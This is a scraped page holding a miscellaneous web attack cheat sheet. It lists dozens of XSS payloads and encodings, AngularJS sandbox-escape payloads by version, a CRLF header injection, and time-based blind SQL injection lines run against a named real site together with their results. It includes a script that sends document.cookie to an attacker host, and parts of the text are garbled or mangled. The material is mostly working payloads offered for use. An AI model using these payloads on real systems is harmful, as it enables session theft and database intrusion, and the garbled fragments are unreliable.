Beruflich Dokumente
Kultur Dokumente
>'>"><script>alert();</script>
>'>"><svg/onload=alert(document.domain)>
<script>prompt(1)</script>
<script>confirm(1)</script>
'"--></style></scRipt><scRipt>alert('XSSPOS ED')</scRipt>
/><script>window.alert('XSS Vulnerable');</script>
<script>window.alert('XSS Vulnerable');</script>
#<script>alert(document.domain)</script> dom
<script>alert(document.URL)</script>
<iframe src="http://www.cnn.com"></iframe>
<script>alert(1)</script>
json attibutes
"--></style></script><script>alert("XSS")</script>
-------
Fiter xss
/?#&;:="%<>@[\\]^`{|}
'';!--"<XSS>=&{()}
Fitered:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
2%69%70%74%3e
<ScRipt>ALeRt("hi");</sCRipT>
vulnerable"%3B%20alert(%27Mondays%27)%3B%20"
json attibutes
"};alert(23);a={"a":
html tags
</script><script>alert("XSS")</script>
<body onload=prompt("justqdjing")>
>'>"><svg/onload=alert(document.domain)>
"/><svg onload=prompt(document.domain)>
"></script><svg/onload=alert("XSS")>-- url
https://www.zopim.com/#1=1&__zopim_widget_proxy=1.zopim.com/s/W/xdds/PIJ4+155G8p7LL3w/c/
1444997086678%22%3E%3C/script%3E%3Csvg/onload=alert%28%22XSS%22%29%3E
'|alert('XSS')|'
%27|alert%28%27XSS%27%29|%27
%2527%257Calert%2528%2527XSS%2527%2529%257C%2527
';alert(/xss/)///
';alert(/xss/)///';alert(1)//";alert(2)///";alert(3)//--
></SCRIPT>">'><SCRIPT>alert(/xss/)</SCRIPT>=&{}");}alert(6);functions+xss(){//
------
javascript:alert(1);///// -outhn
javascript:alert(1);
javascript:alert(document.domain);
<ScRiPt%20>prompt(document.domain)</ScRiPt> -- naem
http://www.aol.com/?mol=acm50overlaynl031213a8345 …<%2fscript><script>prompt(/Osama
Mahmood/)<%2fscript>22606c823c6&icid=acm50newslettersignup&shw=1
<SCRIPT>
Document.write('<img
src=\'http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>');
</SCRIPT>
------
'<script>alert('xss message')</script>
"><script>alert('xss message')</script>
>/"><script>alert('xss message')</script>
"><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>/><':
;<><script></script>/<script>alert('0')</script>
</script><script>prompt("test")</script>
"><script>alert(document.location)</script><"
--------------------------------------------------
<b><h1>Html Injection
<a href="example.com">asdf</a>
-----------------------------------------
3:- "><script>alert(“XSS”);</script>
" onmouseover="alert(1)
6:- %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
7:- %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
8:- %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E
9:- %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E
"()%26%251
-------------------
https://www.poodlescan.com/
--------------------
callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)//
javascript:alert(document.cookie);//
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
CODE :
%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
<script>alert("XSS")</script>
<script>alert("XSS")</script>
<script>alert(%34XSS%34)</script>
<script>alert('XSS')</script>
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_onerror_and_javascript_aler
t_encode
http://webtechhut.blogspot.in/2014/12/cross-site-scripting-in-two-subdomain.html
<input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)>
<IMG%20SRC=axc%20onerror=alert(1)>
CRLF
"37d8600defb103276f30e279f5fdcb6d %0D%0ASet-Cookie:%20Attacker=Attacker;
MOre advance
XSS called CSS (Cross-Site Script), cross-site scripting attacks. Malicious attacker to insert malicious Web
page using html code
When users browse the page , the Web embedded inside html code will be executed , so as to achieve a
particular purpose malicious users.
One is to attack from the inside , mainly refers to the use of the program 's own vulnerabilities , cross-
site constructed statements, such as : dvbbs of showerror.asp existing cross-site vulnerabilities.
The other is attacked from outside, mainly referring to construct their own XSS Cross Site pages or find
loopholes than there are non- target cross-site vulnerabilities page.
For example, when we want to infiltrate a site, we have constructed a cross-site vulnerabilities pages ,
and then construct cross-site statement , through a combination of other techniques , such as social
engineering , etc., to deceive the target server administrator to open
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=jav..??..S')>
<IMG SRC=jav..??..S')>
( 13 ) embedded newline
');">
<IMG SRC="javascript:alert('XSS')">
( 17 ) null character
( 18 ) 2 null characters , null characters in the country and basically had no effect because there is no
place to use
perl-e 'print "<SCRIPT> alert (" XSS ") </ SCRIPT>";'> out
<BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
<SCRIPT SRC=//3w.org/XSS/xss.js>
<iframe src=http://3w.org/XSS.html>
<SCRIPT> A = / XSS /
Code:
<INPUT SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
( 38 ) remote stylesheet
<STYLE> Li {list-style-image: url ("javascript: alert ('XSS')");} </ STYLE> <UL> <LI> XSS
SQL
'%2 and if(substring(user(),1,1)='c',SLEEP(3),1)+' - true (sleeps 3 sec)
----------
---------------------------------------
Referer: https://parapa.mail.ru/forums/showthread.php?t=106825&page=74&p=3522012
parapa_sid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(2000
0000),1)))a)--%20 - true (sleeps 5 sec)
parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),2,1)='a',sleep(5),1))
)a)--%20 - true (sleeps 5 sec)
parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),3,1)='x',sleep(5),1))
)a)--%20 - false (quick response)
parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),4,1)='z',sleep(5),1))
)a)--%20 - false (quick response)
------------------------------------------
Blind test
<div ng-app>
{{
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
}}
</div>
<div ng-app>
{{
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)')+''
}}
</div>
<script>
onload=function(){
document.write(String.fromCharCode(97));
</script>
1.0.1 - 1.1.5
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,
0,'alert(1)')()}}
1.2.2 - 1.2.5
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert
(window\\u002ex=1)')+eval(y)+"'");}}
1.2.6 - 1.2.18
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23
Mathias Karlsson
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toStrin
g.constructor);}}
1.2.24 - 1.2.29
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002e
x=1)')+eval(y)+\"'");}}
1.3.0
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
1.3.1 - 1.3.2
Gareth Heyes (PortSwigger)
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
1.3.3 - 1.3.18
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
1.3.19
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
1.3.20
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
tIME PAYLOAD
%22%20onmouseover%3dalert%281%29%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bhe
ight%3a100%25%3btop%3a0%3bleft%3a0%3b%20d7451
<script>alert(“Xss-By-Muhaddi”)</script>
“><script>alert(“Xss-By-Muhaddi”)</script>
“><script>alert(/Xss-By-Muhaddi/)</script>
</script><script>alert(“Xss-By-Muhaddi”)</script>
“);alert(“Xss-By-Muhaddi”);//
“><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>
“><ScRiPt>alert(“Xss-By-Muhaddi”)</sCrIpT>
“><detials ontoggle=confirm(0)>
“><svg/onload=prompt(“Xss-By-Muhaddi”)>
“><body/onload=alert(“Xss-By-Muhaddi”)>
Style Context:
body{xss:expression(alert(“Xss-By-Muhaddi”))}
xss:expression(alert(/Xss-By-Muhaddi/)
<<SCRIPT>alert(“Xss-By-Muhaddi”);//<</SCRIPT>
%253script%253ealert(/Xss-By-Muhaddi/)%253c/script%253e
“><s”%2b”cript>alert(/Xss-By-Muhaddi/)</script>
foo<script>alert(/Xss-By-Muhaddi/)</script>
<scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>
Advance Payloads:
Hex Encoding
“><IMG SRC=x
onerror=javascript:ale&#x
72t('XSS')>
“><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
<a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>ClickMe
Alert = a\u006cer\u0074
Prompt = p\u0072om\u0070\u0074
Confirm = co\u006efir\u006d
Javascript = jAvascript
: = :
( = (
) = )